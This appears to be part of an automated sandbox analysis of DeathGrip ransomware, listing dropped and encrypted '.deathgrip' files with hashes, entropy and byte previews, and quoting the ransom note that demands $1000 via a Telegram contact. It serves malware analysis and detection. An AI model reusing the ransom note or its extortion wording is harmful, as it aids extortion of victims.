                                                          SHA-512:EC5A8207EFBB7CC3C4EBA86A5C36A7AB2B07EC4CB50DCA9A8E73A2335359E757AFAD201F0619FF652A27FEC89205C1B26F7A563A44A7AEA82E21622D4FA95FDE
                                                          Malicious:true
                                                          Preview:.........S.....1..7..jT.U..N4=l.V.7[....c.......~.m,...$Ci._~..i.@T...._.E)A-[$0..]x..u.e..Z.h}..4..%1.qCP...)"d.....z,...O....E..S.;..~.~?..IV^...[oCh(In.[t._..TD4.}.,.(.....R7;..m.(...}~..].....d..~`X.........w.Q...Hcj..e.R...u...&.B.{u.B.,k.03.f...._.;E4.j......:Q...V..`.....G<...z|v..`.kYJ....A:.R........6oG...&..........E..8.i...Y.p...n.....K]^..:..%z%..B.b...J..3mDw.[-.5../.?9l...tw..z...,h;.....R_.....O..E.."N..X..R{`b4|....t.]...z...4.M".r.B.H..6w..CtE%..&..@;.5$a..u.|..%6,..S..5O2....i...d$(.B.]..i..,...U.....,s..J#<g!|J..L..O.n..3W..u.......- 2.>r0j...Cb...4...9.%....X`....`....@.k..2.qw..a|Kk}..l. ..{.0'....m....,_.../.}.....]'..>3.0..}.&..=w.........x.#.q F.L...(5......f.y....m6.o..x.U....7......!.".ze.s._..`a..*....K..{..4.C......^..{..Wq..%AA.M_...B....q.=.L0;r.....j.......U..>...deF.>..u]H.$P.zB..J..B...)C...D.. nv.>p..Y...&..4..'1U;.J.Sw..x.+P8G....N...#a..%..g....15.....4...cx.OB........J......`l.:.u...$y>:..$.#Y.....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.991738103166166
                                                          Encrypted:true
                                                          SSDEEP:768:6YBk4BC4zioKc20oxjPqUOXPoupVBXmTvP:6YB7o9swuxmTvP
                                                          MD5:CF5502531093A9E5B3AD1FD815EFD7B0
                                                          SHA1:9A6C710CD7CEF20A142697B4E207B3064E0A720B
                                                          SHA-256:7F513C2D18F5BFC6C3F5EAF8A61A801330249AA79942DC322B31106185484C5A
                                                          SHA-512:02F0A2A7FD8230F5E3DFB683AA353902624E218539882B715376EEEC271265C4C48C4DA0CB52B2B467EBA65F5250157DAEF3D75EFB25CFCCEFB404691D22D08E
                                                          Malicious:true
                                                          Preview:.........]../........nK..f...HnF.94......y..S.".h.EA .W4.h.e....4........E.8...*. .8....F..Uv3.I.{.*._.d..e........V-ra..Y.0..0...h.S75.'...@.B.@m.....;_...R.6s..n.l....HM..*..9...S.@.w..=d.".sv....-..;u...`/...7.^.......(...D.k&t......+.[0...AR..?.....]40Z....(.y..H`_.0..h...jrB.4.Y.&3./..7..u.....nD^.....<@...P!.fkUQ/z ...|....ag..uB.94.)..Z.X..9..zI.~{@.......q.....2.....yn....$k.3:>.Y<8..ke...0wxV.bi.#3|\.E.[q.....c..(..y.C.<m......5.A..6..\..K.G..D.....j3%@.v\@.F.......Z^HH.....q..7..=.\.......qR.sS.P1.&......i.w.m.....Dt.v. ... ...T&&.Q.*.....W.[...#.R.z...2s.w.tz....../.o943(...l...r....Q.P W.?.....Z...."..q.qn.....D.u~..[!z..6Y%.......X]CM.(..I..e<x...&..qC.{s.Lk.}T...8.i.....#.z.4....8\f...d..VA..o(g..w...h{........0qs'.`..4..8...d.Y..v(U..J.2../..5.u.o..W..k....`..^fo........e*...].^FO..r...M.......B.G."W} .]fIwz.Y@X`0...j.....A..hQ.:..7...M.Kt ..c..|..H.tv...m ..rm...:.^..h'.{g..(/V...$.z`.Qj...B...<.i.#%7.>..Q.......V?g.L.x.P........)...TC..

                                                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.75991444398015
                                                          Encrypted:false
                                                          SSDEEP:24:4xrkxoKe6QuoFmWi9WnAF4/0tA6iKb/DLbFm6jXy9CBXDptaswdjQaYS5alufvmn:a8oKW9I9sAM6PnO9sXydsDSwr
                                                          MD5:15BC9F4F765C06C70B162B60E8CDD45D
                                                          SHA1:67DD6D0232913E21EF47B8DDBF8028BD99D29466
                                                          SHA-256:66C05A471B3A8C7289151C6470E11AB15143668523291FEA7F756708901415B9
                                                          SHA-512:59057C8FB3D41E5911E985C14406C217FB678871CD5612BD469F0CA5A2048D01423A657511BECA9CFCF2888C076FBAAE4D9852F9F3D860DF5C1AAECB7AE1D8DA
                                                          Malicious:false
                                                          Preview:..........gl..>,%?.il..SF...F/.}^.hXB.{.T...06..wsp..r.R.|..g....DE.p.{4u..M...'..@t........F...`O....3(....9.Ir:UbxJ.h..4..GI....o..C..@..V.....]b....;|..=?..k.0....`.5f.I......?.......Z...(.I"....&b........nq.wz.,7#.{.....\..a.8.s..].......qE..i....k.%p.L9...._...h.K..N..^}u...-..<....U.3...%....].*....T...w...lF..i.L.7p.. $..K..G%...UT.j. AI.........G..)&x.^.s$.C..q..j.`.._...Os.(.4.~b.......].0....o.E.V......%. S.(.$_a...,.....#(k$..>~D.p..rX.:..2.d+.9...../[. ...T..hd....i....m:g.q%qw..../..Z(==.0.;...Ed....-.%i.\..L4.Y..*....r.w6.u.GhFU....a`.....Fj5...{....vV....vgI..K.h.,K.v.JRS....1,.n.......O....8..7.|.irW....Sy.iH......b.%8.P....... T.....N..\..:..c.\f3...J+....n.......8x.L........J......L1j..jX.c.....8..@...?..x.'.L"........[..esOd[.kM....Yl.Z .......;...`Am7.L....zh..5.Z....../.=Z}..NH..}%...4.@..Xo:.FN..5..!r..<<.Alg....Q.2......,bHE....$..].RC&.o..^J~.%...a<u.{..}..^......).....(:.0.p.1.z.z.G.~.....b...V..v..^..>;)..... .)G...

                                                          C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.063506008230466
                                                          Encrypted:false
                                                          SSDEEP:6:qoDS7l+G+HKj1YKcnKpLeGTQSKz6WbuUkUNJ/IqT8hLWdifvUF:qeS7AG+HKhY7nKpaE2z7uUkUbIqgiifU
                                                          MD5:2BDC5B56A728BA6705A99471AB6BA7F4
                                                          SHA1:52713B260EB012860A84ED9863B291A513000C6A
                                                          SHA-256:23AEEF3B288AA09DDBE524596261F50D3EFBEB04A51553618F7A67D124DDEEE9
                                                          SHA-512:A8E59D49CA5A7455AB344158BF5B331105DC8940472016F3739E2EB3FD387704C8FD0183078AFAB65B5EDD2D1F15FE9624DC8E978431EEE77DBA2B2A6BADDCB1
                                                          Malicious:false
                                                          Preview:...........gh1jIEQ~..&0.uSpHU+QDDjd9IryIgDDf654NGDT+15rrobwUM07HrGhQQQSC0COJk2HkRwkPc5zVidqZtOfaI8/49vnXwVr3dSPX4zYqdqO0S2q2/kk1r62bv5YeVr2/jZt8bpEI3zy+DgVGVrXT7R9Ro1jRon3riOVy14mrIYm1txiJGySCwRXMO4cgQvPFAjhPo97uqhW/xsWnb48y/1F5Z6nnKK8Uk3NjBLUzAcauqVJzuDiz/0P6rqwm8EMHXTt5xdq+9V3ij4/3CLOOvCWPYLcBrHSa0E30XVlCVUUXK13Zj/rNFx5RJAsdQrrA5d6zlLImQ4Adl4vCeyGwUDG5TzMq1RbLkg==

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424176
                                                          Entropy (8bit):7.999536768625056
                                                          Encrypted:true
                                                          SSDEEP:6144:68yMeoINu7rNLjtiOj/klD7z7tUGTlLA/Qntx1h3wkiDl4BsRbR3QduOa:8yYO7kZf7CGq+zEl4eh5Oa
                                                          MD5:31F31FE7C90C90712D4408285C550470
                                                          SHA1:19C896C8249EB4FDB3E8DFD8452FE7FA75B4E7D1
                                                          SHA-256:239279E10B455DA7B4DE98C16E84400B4340178ACE7F122E414E8374BC41514F
                                                          SHA-512:94887F84C0C9AE01FA4C62EA273D56B87FB7D20065158960CA2904A01AD3917E9D90AD4C987AD644DF652E375E23E132FE538672CC0422F59CCD65B871A09265
                                                          Malicious:true
                                                          Preview:.............:H0.A..|I...ecQ>.WZ."...{>....K~...p...W..h=.=....Me'.Y.r.v..x.X.E.f.5....zKk=..T...<...tH......L...........Rk._...C..m....L...F.|...c.sa.E...`..9E7..cF..s..c!..@..j...)F^.......|..F.......!Fd#0C+.._-P.(X...N....X.S..q$....|..YZ.....I?..M...D......q.........iy......O...;a.&...6H.."3._.E..(.kS..0..|.....J...7.^7 U..!.........:.!.%.M.i...j`..t}.Hx.<..s.>.&M...fU....o`7.....84H.^.D..........:.X..8..GmWz.....sB.L1..!....E.....4.0./...d.H.>....L.)v.G.....L.g..m..U..lF.P......";..Wq..z.a{.Q...+.jm:...)...rE=...G.r...X..3#*.......T...G.<,...G..Ubh`.H,E..@.....{'.m.U5........Fz....B........)-L/..Al.O.@.$r.......F.....0....+c"..b<.f....?T.......3f^...F.r...(.I._......k...(......F...R[..-sP.h...d.B0\..*f.fM...j..................A....w.$I..L_.&i......*..V..-...Z.......?..w2L.X.n.2,..!...%.K...N#..5xj. .-.....=..k...kz.f..7*...Gj..p..6.....W.No[.p....Rl...k...0~@.D)1..j.E8.K[3vC'..k...Q........"K.1....8;..Nx.g_...J..!.....@iw.!.A^..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\IDP9OXZ4\container.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\IDP9OXZ4\container.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.082425927310368
                                                          Encrypted:false
                                                          SSDEEP:6:G+TVHvzFZMpUriczpenlasCMOf4jg9xA1yWLX1fDzLaJmA8n5+:7KUE6Pfig9oLlfDaJJU5+
                                                          MD5:D3174006FBA480A7574A08D5917299F8
                                                          SHA1:0643966F2016970D606B187F2E088C6BEAFDC467
                                                          SHA-256:A0D704CD3925B82D884CA9A76B02EAC72C12D276FA846CAAEA65D837405A21CF
                                                          SHA-512:6253FC67FC40D5E4B5E7E5A03C416500011500C329370C7EAF0D1F73C700CEDB97D146EC19D5953670F314555EA4F1516589632C9A780DFAA7CB32C62F63B921
                                                          Malicious:false
                                                          Preview:.........i%.VZ.......3.CoTIRb5YNGI/U52cBOlNjsvXvktn9ag4T6FOTzuXFHv8FMsZEqFxJaIsjNYdF/rKUwultIY1UN3eUg3uQQMe312r1BjlztM29QJ0VCbcuY6Yi8uHfp7LCDsyy26qtMU0u3Y2xA/uJUAHq48cp6MKszqow06e4k6/B+zgQMp5Jjwxgxgzh4VkBwYkeuGRr3PIpFMy0u7p4PcPu/O/qiCFXvqmIlqur3bEifox7ZMVhbdDSwxjgMPJlGQ753Q1FITGju5c/XEsnY+3grvjHg6XrHi/03gh4+HfufVsS+PYXV+LnP9DTsbUkevO8xQj4e7YVxI/MLnVtadYQ1wdsJQmZA==

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\container.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\container.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.072182900917685
                                                          Encrypted:false
                                                          SSDEEP:6:KjnwR1DZnhPDC4vysbcvAa7STeO+xI23AB11aS9vjM/gh5VbnalIH5Wy4IZUnLYY:KjKdZ5xy1HGTKwByOwofVaqW2UL1
                                                          MD5:F45C355B5BB0FDD45CA55BF973D22CD4
                                                          SHA1:80CDA80995150D263E57D9D67FC47B47A928B3D6
                                                          SHA-256:E4E87F112A1A63DF1B25D3CF1DADF65EADC40C5F85F23B6AFD1DEF23824466BC
                                                          SHA-512:0973823AF62D8D8CFC1C62269693C7EDE8E295103532E4C4A97F814E5F6C93C79C4D00AD549AB8EB4522F3C6967DE8A64539AD80BAFEFD941288815056A764E2
                                                          Malicious:false
                                                          Preview:...........FV..f....F?]k672ezJG3XxUS0VUnCI7TWr73KaKOk4zT1okWQu9h9XCDo3MF3Y2+aLt5BhZUh7t3+3mICDQa+4XlUcxbHaqMjruJgCMu4a5sIr2ZrMgCWWhRV8V3JkNBm7YiLVVSf9NIzZ8JMTAHJDZ5b6jAx9keLZBTCzLykOAVHAueQIkC/k3GMg4YjztOeZmulNVQ4H03lVRUwX/RlxyeMwM1QstRPrlWw5BbJL5J13lZg3+5ED1GXTgWR6LMntuSEMxQE4iR2+9Sa0QcEUOqe3gTvPhMM/mCfmRiwXNFx9DVp6b6MHwtIU6GLSPD1yLkQ3bg4cI5aSdmk2VxxOVqxrN8S1rkA==

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16752
                                                          Entropy (8bit):7.9875587629858105
                                                          Encrypted:false
                                                          SSDEEP:384:YF0O0uJRpX4IuhNfxwy/OtLZNasNEi30HWWzmfCNR:YF0nuLWIMxwhtLZNasNb0vj
                                                          MD5:DC56726763AE58E24EFBD420DD4203CF
                                                          SHA1:27EA527DD887E15375B340659FA2C8400CC2108E
                                                          SHA-256:DAA23E130FFDC95EBBBE92AC30D49CF006E1651B2DF256D8E3AA33597197CFFD
                                                          SHA-512:9682980E5590D8BBA9D10E125CAE8B56B6D368D660CF5B56B861E526F00E3052021E6AB2E609CC6F046EB2C173DDE00E0F39D3F0D6032D9205981B5E16CDDE37
                                                          Malicious:false
                                                          Preview:.............3.D.E..+Cw..c.7W........*....w.I6.@....H.....C!...sE..,.V.........:..@..F.u.....ht.5!.. -....<..q!ruSM..Q.........O..G....xtA../d`....Oc..`...R...7X.4.....WYeH3.LH...wB.HMm}jH4...$.4.<s..A........|......A..q}....==..n....".{.I..C.G.v......<.;.y..B~D.{,....`\CWewP.......F.D.v?..7.l...F;..-.@.-j!.....s....Y.~-..*|;.....n....,^i..G.....r.<e.t....B..x..f........>.Hm.y..].-..1.n..9...=..%7.?:.`#.....7*F.4..S.{L.I.s6..Z.....a..E....".a.|.8......|.j....[.......z9#....&...B>PY...k. 4...g+V.......=..g..lN.A.}.t2E.)...]....H..qa oWd_.kR.oWo..........D.}...I.3.......`d1,dM...............1...Z..Y[.s....*.n.>"0.!..NHx..e..6.....:.VG..Hd..aWp.......w........=k.x,...b~j?c.Y.._q!."......-..p.7h.@.u..M..CJ[u['.J.W..p.o.....,c..loe....5B.Z....D...D$....L.I.#...;.F.q..........m.CL..+.. .%.........y^.(}H...a..]>m`9.h...[.8......Slp........V&.Q.[.p..h;. ....n..WP..k2.......Rid...c%!JSi..e......W.@..~.W.&....y.suC.@.Q!..c.m.CL..0..k<.O

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16752
                                                          Entropy (8bit):7.987149396302931
                                                          Encrypted:false
                                                          SSDEEP:384:/ICr/oRLZjceOMDXKgY9uJblkO8MFT96zre2sNPdvAey:/I4/oFZDbDazuht8MFT96z62scey
                                                          MD5:DF8D347FF1979603CA90FB5DFEC3033F
                                                          SHA1:E5D2685377E76CEA76D818132B61B23E9573FA2A
                                                          SHA-256:FEA5ECC8AF2FABCE9FEF18666AA0B12B1132663D4F80F1BD1C3244967FB812E9
                                                          SHA-512:849161AB5F3B4A8AD7A09CEB3066C01BFD436C707BF5C022B540B455D54CCA854E1124864E20B1B881E1D88DBDFA9E08E582D2D1529B9CCB4E94E2028080AFA3
                                                          Malicious:false
                                                          Preview:..........W5Xq.......'....&{.{.D.p..1cp:{..(...;.SpM..-.{S.K[....+..F.ox....1.e\.G.B.@.......u.V.t...h.a.k.69....y.0~..q....DjK...>0..T...3. ..|<JO%.._.5?..*..~...........;.D...!.T....)*..~.......@...$.;.u....G...1..R.YH....d...@.H..C..F&.-...5.......c$.c....A"Y.,X.Kv2.....F.#...ac.........'...y.d.rA...^ug..n.[..v......d;...nZ.+...kJq...S:Kq...\?H.2.<dH...eC...\`.lY...l..|..O.W.H.r.....B..+...h.A*.[.i/R.....T.>....].9an.^...s.S..V`.e...ua.2<...&zw.d.5p.....O...tF.^.2./t..w.....S.[..0n.`...8T.5.X.g..F%....X...X@.._..g?'d;T.Au[n6..h.Y..u...3K.>..:..I.Og..T.....Bt....g.mt.62...K.....u,....)Q...v,X...,...[.7w...Gg...2...].F.f....>.. .!..X.2)"pk...2m..*.R~1..2:.I{.m.x?..$Vx]M...5_9...f....e..Zs..hsc@..S..}p.o....u.<...8&.U......G.7..#r.<...'#....[.kg.2g`0W...Z.....N.)..}..1....,/..].G....4.....5.-.@D...f...F:;t.=....!m..wF..5..".....a.2...:I'.Z.\P.%)2........w*.....R....A(.....M...3.......1;..l.~....[p.. ^......D...@..}..RJ.........J...._..$p.6Q..K2

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{29565D0C-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424224
                                                          Entropy (8bit):7.999581303313461
                                                          Encrypted:true
                                                          SSDEEP:12288:L0S07tFJNSZiHszH+mwwB+DJSj76ScjNhNTwLdU:LT05AzfQJSPINh9w+
                                                          MD5:51F826DF74857AD2CD3688AC41F7E3E9
                                                          SHA1:6D6EEF1562AB63DED27696EBE6A9A51CE7799534
                                                          SHA-256:5674B814FFA787424E0616A213E17850089AB6B791A3B33A551CCBF00EA5DC19
                                                          SHA-512:F23C934FBA15EDD599AE203A5EC48ED60907BAFB98D90481CE6F5B36CD056C3399A98643F5AA3C90E72AAAFC2E5FEF2B7699C0D0E469700D7F92464906CC5B67
                                                          Malicious:true
                                                          Preview:.........I...............+r...+.JW-...e&......3.U"....?.=.{j.F.L.Ud..&Eo.O[.....4.Zw.x.^...O.cd...n.V..>...Z..f...b?....E.H....g{..Z.+0xl...qC.fm^~VB^.F.S.........E48..d......S.y...#.....q..K....<5..*...X...gOg.....X.I.(....6.:P...._s.&..N-...Z.5vtbf...;..j......!e.X..V......d.}gZ.G....P..&.6O{9..|I.]..R.>q........It+\.p.GA|.p;......".y..1M.d..`f..........g(8..}......a..L1.L..E.g.".WB.?.U...NG..m...,QvT!....k5..[.(.....g.^.0.V.r%s...|.b..V..o..Up......P..T..`].RSE....].'.B.......Vs!.C&ny].|xh..j.H.`E4pCKZ...~..=$./?........../>...Bu.$RH.....n*..o..p:....o...~.....l..?~.`..])Y.......cDo....p.y.Z..;..+..{7.h...=........Z+...-o.q...#....[..g.+mU.B)^f..Y.qs[..I..d..O......em....#^....R.*.s...~.......j.............:j80-E..~....VY.........|..rs,.........Zsa'4</.yqg...$$..S\......;W-t46...q..Y9F..7J....c+.pJ.L.......^.u1....c,.af.p...6}."........./`..D\........x......S.F..8.q.n..t....LT..J..&...o.<..8.P../J.$....a/.......e3}...t%.iP.0:.2.."

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):384
                                                          Entropy (8bit):6.235171332360541
                                                          Encrypted:false
                                                          SSDEEP:6:2RpAcdtVu2vkjE+VUyPIbcYKT2Bi3VEHO8cFuTv4Jw29oh259z/QpSicrHh+J8Lk:onu2tpYIbc9SBQfnFcQJw2ig5xQSHYaI
                                                          MD5:87FFDB00005ED57B4170EFE38A32CD22
                                                          SHA1:F3489AE8D7457278F5D1B00228520D1AE1547307
                                                          SHA-256:53988E590D45F2CD87E17F3BD770998D210E8224245C2110F3BEC209E791A0DE
                                                          SHA-512:CF4790B7211B17E3BFED24041621C9AB7D26AA8A24B1D98B939B36634D85942EDEC2DF965116DAC2FC12B7B21E2EC5588FC63FBEFD7BB427187EB19A766E957A
                                                          Malicious:false
                                                          Preview:..............(...c._D&.v..>0...bH..z..%x/1a/RbQUulV/4YQ0KSHtSADfBtNR1F+yb5X1zOomxE00f0JaV16wt7EY3lPmOZDoFvlMf4rcylwutz/MPYWer2BYGHE6rhwVVPjvBAgDMA+ympAlcjTiGUaq4e1YoLu8OzgE4iATdzeHHb6+u4RKr8pxtm2Jj+W2hPQlq/vpVOVSYXKwwda5UvJtGz2hj12vcd1Z9v4pMxEKXqeJhY/cXROS69xAfVasVshnSDAOXTPSqWEuvjRIsWKhyXCpy543klQNoB9OemfsDtFaJTOAtfBY9JoyyIjkg7YFcvhMQ1jUcqqaLVh1TXf3gJSEbh+lm8RsdRmuHe8GN/xxLQOMg==

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\WebCacheLock.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\input\en-GB\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
